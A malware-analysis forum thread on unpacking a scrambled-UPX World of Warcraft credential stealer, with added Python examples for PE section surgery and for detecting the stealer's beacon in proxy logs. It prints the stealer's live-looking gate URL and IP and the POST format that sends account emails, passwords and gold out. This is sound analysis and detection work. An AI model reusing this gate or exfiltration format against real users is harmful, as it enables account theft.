A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21871  by rinn
 Sun Jan 05, 2014 2:33 pm
Xartrick wrote:
rinn wrote: It's really UPX, just a bit scrambled. The unpacked file is in the attachment; all the interesting DLLs are inside the .rsrc section. Even if upx -d fails, you can still unpack it manually.
Did you figure what makes upx -d failing?
Yes. It doesn't like the .Silvana section (which owns the import directory), likely added by a scrambler. It does nothing and is only there to confuse UPX's canUnpack() or whatever.

Cut the .Silvana section off the file and correct the size of image in the header
Restore the Image Directory Import pointer
upx -d

Best Regards,
-rin
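The three steps rin lists (drop the trailing section, fix SizeOfImage and the section count, put the import directory back) as an added worked example in Python. This is not code from the thread or from UPX. It assumes the scrambler appended .Silvana as the last section with its raw data at the end of the file; the PE built by build_sample_pe() is a constructed stand-in for the real sample, and the import directory location passed to strip_trailing_section() (0x7F00/0x28 below) is a hypothetical value, since the real RVA has to be read from the actual file (UPX keeps its own small import table in the UPX1 section).

```python
import struct

SECTION_HEADER_SIZE = 40
IMAGE_DIRECTORY_ENTRY_IMPORT = 1


def _align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def _header_offsets(buf):
    """Offsets of the file header, optional header, data directories and section table."""
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    file_hdr = e_lfanew + 4
    opt_hdr = file_hdr + 20
    magic = struct.unpack_from("<H", buf, opt_hdr)[0]
    if magic == 0x10B:          # PE32: data directories start at optional header + 96
        dir_off = opt_hdr + 96
    elif magic == 0x20B:        # PE32+: at + 112
        dir_off = opt_hdr + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    opt_size = struct.unpack_from("<H", buf, file_hdr + 16)[0]
    return file_hdr, opt_hdr, dir_off, opt_hdr + opt_size


def pe_summary(pe):
    """The fields worth checking before and after the surgery."""
    file_hdr, opt_hdr, dir_off, sect_table = _header_offsets(pe)
    n = struct.unpack_from("<H", pe, file_hdr + 2)[0]
    names = [struct.unpack_from("<8s", pe, sect_table + i * SECTION_HEADER_SIZE)[0]
             .rstrip(b"\0").decode() for i in range(n)]
    return {
        "sections": names,
        "size_of_image": struct.unpack_from("<I", pe, opt_hdr + 56)[0],
        "import_dir": struct.unpack_from("<II", pe, dir_off + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT),
        "file_size": len(pe),
    }


def strip_trailing_section(pe, name, import_rva, import_size):
    """Cut the last section (which must be called `name`) off a PE, fix NumberOfSections
    and SizeOfImage, and point the import directory at (import_rva, import_size)."""
    buf = bytearray(pe)
    file_hdr, opt_hdr, dir_off, sect_table = _header_offsets(buf)
    n = struct.unpack_from("<H", buf, file_hdr + 2)[0]
    if n < 2:
        raise ValueError("need at least two sections")
    last = sect_table + (n - 1) * SECTION_HEADER_SIZE
    prev = last - SECTION_HEADER_SIZE
    last_name = struct.unpack_from("<8s", buf, last)[0].rstrip(b"\0")
    if last_name != name:
        raise ValueError("last section is %r, not %r" % (last_name, name))
    raw_ptr = struct.unpack_from("<I", buf, last + 20)[0]
    prev_vsize, prev_va, prev_rsize, prev_rptr = struct.unpack_from("<IIII", buf, prev + 8)
    if raw_ptr and raw_ptr < prev_rptr + prev_rsize:
        raise ValueError("section raw data is not at the end of the file")
    sect_align = struct.unpack_from("<I", buf, opt_hdr + 32)[0]
    # 1. cut the section's raw bytes off the end of the file
    if raw_ptr:
        del buf[raw_ptr:]
    # 2. drop its header entry, then fix NumberOfSections and SizeOfImage
    buf[last:last + SECTION_HEADER_SIZE] = bytes(SECTION_HEADER_SIZE)
    struct.pack_into("<H", buf, file_hdr + 2, n - 1)
    struct.pack_into("<I", buf, opt_hdr + 56, _align_up(prev_va + prev_vsize, sect_align))
    # 3. restore the import directory entry the scrambler redirected
    struct.pack_into("<II", buf, dir_off + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, import_rva, import_size)
    return bytes(buf)


def build_sample_pe():
    """Constructed sample (not the real file): a PE32 with UPX0/UPX1 plus a trailing
    .Silvana section that owns the import directory, like the scrambled binary."""
    sect_align, file_align, headers_size = 0x1000, 0x200, 0x400
    sections = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        (b"UPX0", 0x5000, 0x1000, 0, 0),
        (b"UPX1", 0x2000, 0x6000, 0x400, headers_size),
        (b".Silvana", 0x1000, 0x8000, 0x200, headers_size + 0x400),
    ]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))                      # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<II", opt, 56, 0x9000, headers_size)           # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, 0x8000, 0x28)               # import dir -> .Silvana
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, 0xE0000020)
                     for n, vs, va, rs, rp in sections)
    headers = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table).ljust(headers_size, b"\0")
    return headers + b"\xCC" * 0x400 + b"SILVANA!".ljust(0x200, b"\0")


if __name__ == "__main__":
    scrambled = build_sample_pe()
    print("before:", pe_summary(scrambled))
    # 0x7F00/0x28 is a hypothetical location for UPX's own import table inside UPX1
    print("after: ", pe_summary(strip_trailing_section(scrambled, b".Silvana", 0x7F00, 0x28)))
```

Run pe_summary() on the real file first to read the section names, SizeOfImage and the current import directory; on the real sample the RVA to restore is the one UPX's stub expects, not the value hard-coded above. Once the trailing section and its header are gone and the directory points back into the UPX section, upx -d should accept the file again.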
 #21873  by Xartrick
 Sun Jan 05, 2014 4:56 pm
rinn wrote:
Xartrick wrote:Did you figure what makes upx -d failing?
Yes. It doesn't like the .Silvana section (which owns the import directory), likely added by a scrambler. It does nothing and is only there to confuse UPX's canUnpack() or whatever.

Cut the .Silvana section off the file and correct the size of image in the header
Restore the Image Directory Import pointer
upx -d

Best Regards,
-rin
Thanks.

I went deeper and found some interesting stuff.
The gate that receives the user's information is still alive.
hxxp://98.126.170.154/wow/wow.asp
It is called with these POST parameters:
&WOWID=%s&Area=%s&WU=%s&WP=%s&MAX=%d/%d&Gold=%d&Serv=%s&rn=%s&key=%s
WOWID => Wx32 (always; should be Wx64 for the x64 version)
Area => us or eu
WU => Account mail?
WP => Account password?
MAX => ?/?
Gold => Gold :)
Serv => Current server
rn => ?
key => ?
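The beacon format above, turned into detection logic over HTTP POST bodies, as an added example that is not from the thread. The request samples in SAMPLE_REQUESTS are constructed, not captured traffic, and the validation rules (WOWID is Wx32 or Wx64, Area is us or eu, MAX is two numbers separated by a slash, Gold is numeric) are assumptions that follow the field reading posted above; the gate path is the one quoted in the post.

```python
import re
from urllib.parse import parse_qs

# Field list from the stealer's format string: &WOWID=%s&Area=%s&WU=%s&WP=%s&MAX=%d/%d&Gold=%d&Serv=%s&rn=%s&key=%s
BEACON_KEYS = frozenset(("WOWID", "Area", "WU", "WP", "MAX", "Gold", "Serv", "rn", "key"))
GATE_PATH = "/wow/wow.asp"   # from the thread


def parse_beacon(body):
    """Return the decoded beacon fields if `body` matches the stealer's POST
    format, otherwise None. The password is never stored, only its length."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if set(fields) != BEACON_KEYS:
        return None
    if fields["WOWID"] not in ("Wx32", "Wx64") or fields["Area"] not in ("us", "eu"):
        return None            # assumption: these are the only values the builds send
    m = re.fullmatch(r"(\d+)/(\d+)", fields["MAX"])
    if not m or not fields["Gold"].isdigit():
        return None
    return {
        "arch": fields["WOWID"], "region": fields["Area"],
        "account": fields["WU"], "password_len": len(fields["WP"]),
        "max": (int(m.group(1)), int(m.group(2))), "gold": int(fields["Gold"]),
        "server": fields["Serv"], "rn": fields["rn"], "key": fields["key"],
    }


def scan_requests(requests):
    """requests: iterable of (method, path, body) tuples, e.g. from a proxy log.
    Returns one alert per POST whose body matches the beacon format; the path
    is reported but not required, so a moved gate is still caught."""
    alerts = []
    for method, path, body in requests:
        if method != "POST":
            continue
        hit = parse_beacon(body)
        if hit:
            hit["path"] = path
            hit["known_gate"] = path.endswith(GATE_PATH)
            alerts.append(hit)
    return alerts


SAMPLE_REQUESTS = [  # constructed samples, not captured traffic
    ("POST", "/wow/wow.asp",
     "&WOWID=Wx32&Area=us&WU=victim%40example.net&WP=hunter2&MAX=90/90&Gold=1234&Serv=Illidan&rn=1&key=abc"),
    ("POST", "/wow/wow.asp",
     "WOWID=Wx64&Area=fr&WU=x&WP=y&MAX=1/1&Gold=0&Serv=z&rn=0&key=0"),   # region not us/eu
    ("GET", "/wow/wow.asp", ""),
    ("POST", "/login", "user=a&pass=b"),
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(alert)
```

Matching on the full key set rather than on the IP keeps the rule useful if the gate is moved; the leading "&" in the format string is harmless because parse_qs skips the empty pair. Anything that fires should be treated as a credential leak for the account named in WU.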